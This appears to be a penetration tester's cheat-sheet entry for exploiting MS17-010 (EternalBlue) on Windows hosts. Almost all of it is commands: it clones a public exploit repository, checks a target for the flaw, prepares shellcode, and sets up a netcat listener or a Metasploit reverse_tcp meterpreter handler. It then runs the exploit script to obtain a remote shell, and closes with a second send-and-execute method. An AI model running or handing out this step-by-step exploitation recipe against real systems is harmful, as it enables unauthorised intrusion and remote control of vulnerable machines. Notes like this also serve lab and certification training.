MS17-010

Preparation

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

# Check if your target is vulnerabile
python eternal_checker.py $RHOST

# Prepara attack payloads
cd shellcode
./shell_prep.sh # it is worth choosing the meterpreter 
cd ../

Execution

# Non meterpreter version
Kali> rlwrap nc -nlvp 53
Kali> python eternalblue_exploit7.py $RHOST shellcode/sc_x86.bin 

# Meterpreter version 
Kali> sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 192.168.45.183;set LPORT 1234;run -j"

Kali> python eternalblue_exploit7.py $RHOST shellcode/sc_x86.bin

Send_andexecute.py

This is so obsolete... 
# pip3 install virtualenv==20.21.1
# virtualenv --python=python2 env
# source env/bin/activate.fish
# pip install impacket==0.9.22
#python2 send_and_execute.py $RHOST shellcode/sc_x86.bin

Last updated